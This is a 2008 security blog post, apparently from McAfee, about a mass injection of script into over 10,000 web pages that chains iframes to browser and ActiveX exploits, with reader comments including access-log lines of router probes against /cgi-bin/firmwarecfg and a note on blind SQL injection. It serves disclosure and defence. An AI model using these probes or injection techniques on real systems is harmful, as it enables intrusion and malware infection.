Another Mass Attack Underway
Wednesday March 12, 2008 at 4:35 pm CST
Posted by Craig Schmugar
On the heels of recent iframe attacks, we’re currently tracking another mass compromise. This attack involves injection of script into valid web page to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:
- MS06-014
- RealPlayer (ActiveX Control)
- Baofeng Storm (ActiveX Control)
- Xunlei Thunder DapPlayer (ActiveX Control)
- Ourgame GLWorld GlobalLink Chat (ActiveX Control)
This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers.
Preliminary research results suggest more than 10,000 pages were affected by this hack attack.
Similar attacks were observed in the past; most notable the infamous “Dolphin Stadium” (aka Super Bowl) attack was similar, which was later connected with SQL injection as the method used by the attackers to inject their malicious code. In cases where the TITLE tag has been modified, the browser’s title bar will show the script reference:
Example of browser title bar (censored)
McAfee’s designations for the various pieces of malware include:
- Downloader-BGX
- Exploit-RealPlay
- JS/Exploit-BO.gen
- VBS/Psyme
Analysis is ongoing.
March 13th, 2008 at 12:09
hello,
I do not know is this is related or known: ever few days there is an attack on my website which does not succeed since a pc in general in not vulnerable, but certain routers are.
Here is an excerpt from my access log:
——————————————————————
41.232.21.69 – - [07/Mar/2008:13:44:58 +0200] “POST /cgi-bin/firmwarecfg HTTP/1.1″ 400 431 “-” “veryprivateacsor”
41.234.44.208 – - [07/Mar/2008:22:03:53 +0200] “POST /cgi-bin/firmwarecfg HTTP/1.1″ 400 431 “-” “veryprivateacsor”
41.234.15.165 – - [07/Mar/2008:22:03:54 +0200] “POST /cgi-bin/firmwarecfg HTTP/1.1″ 400 431 “-” “veryprivateacsor”
——————————————————————-
Here is the corresponding error log:
——————————————————————-
[Fri Mar 07 13:44:58 2008] [error] [client 41.232.21.69] request failed: error reading the headers
[Fri Mar 07 22:03:53 2008] [error] [client 41.234.44.208] request failed: error reading the headers
[Fri Mar 07 22:03:54 2008] [error] [client 41.234.15.165] request failed: error reading the headers
——————————————————————-
Complait to the service provider had no result!!
peace,
Jan de Kruyf.
March 14th, 2008 at 00:19
How did they break into the website? If it is automated, it must be a widely spread exploit that is worth reporting.
March 14th, 2008 at 04:28
That is an attempt to exploit a 3 year old vulnerability found in some DSL routers if remote management is enabled and is very likely not related to the Mass Hack Attacks.
cheers,
Toralv
March 14th, 2008 at 10:28
could mcafee show us a video demo of this attack in action, similar to the video for the phpBB hack?
Thanks.
March 14th, 2008 at 11:25
There’s not much to see…the drive by can cause IE to hang, and the payload doesn’t display anything.
March 15th, 2008 at 03:17
# Bas Groot Says:
March 14th, 2008 at 12:19 am
How did they break into the website? If it is automated, it must be a widely spread exploit that is worth reporting.
—————————————————————-
It is automated, it comes from europe, holland and france the last time I checked, and it is indeed aimed at certain routers. There was a general discussion about 3 years back on the net.
From my analysis they request a specific file on this router “/cgi-bin/firmwarecfg” if they are the first running it then it leaves the whole system wide open since they have access to all info in the router or something like that. In any case complaints to my provider or the provider from whose network some of the attacks originate have not been answered whatsoever.
Peace
Jan de Kruyf.
March 17th, 2008 at 21:06
So is it a common web server software that is being hacked, apache, iss what have you?
March 18th, 2008 at 08:52
Blind SQL injection was used to attack ASP applications. The vulnerability is in the coding of the applications and improper sanitization of input parameters.
More details are available here:
http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx
March 18th, 2008 at 12:47
System admins should be ready to prevent their clients from getting exploited and redirected to those malicious domains.
check here: http://extremesecurity.blogspot.com/2008/03/iframe-attacks-actions-to-be-taken.html
March 19th, 2008 at 12:08
So, how can an ordinary user recognize if their computer is infected with this virus/trojan? Is there a file name we should be looking for in the Task Manager or elsewhere?
April 24th, 2008 at 01:37
[...] quanto dettagliato sul blog McAfee, il server malevolo avrebbe tentato, come indicato, di inoculare tramite iframe [...]
May 14th, 2008 at 10:08
[...] Following the big noise that the latest mass injection of sites with malicious Javascripts infecting many computers via a number of exploits I decided to [...]
May 16th, 2008 at 14:42
[...] In March I blogged about a round of mass Web site compromises. Since then there have been several other instances [...]
May 16th, 2008 at 14:42
[...] In March I blogged about a round of mass Web site compromises. Since then there have been several other instances [...]
May 25th, 2008 at 08:08
[...] March I blogged about a round of mass Web site compromises. Since then there have been several other instances [...]
July 8th, 2008 at 03:49
[...] conocida compañÃa de seguridad informática McAfee ha informado de que ha identificado más de 10.000 páginas web fraudulentas que intentaban colarse en los [...]
June 19th, 2009 at 00:42
[...] aan hackers in massale aanval Hackers hebben een massale aanval op duizenden websites uitgevoerd. De hackers hebben daarbij ook de website van computerbeveiligingsadviseur Trend Micro aangevallen. [...]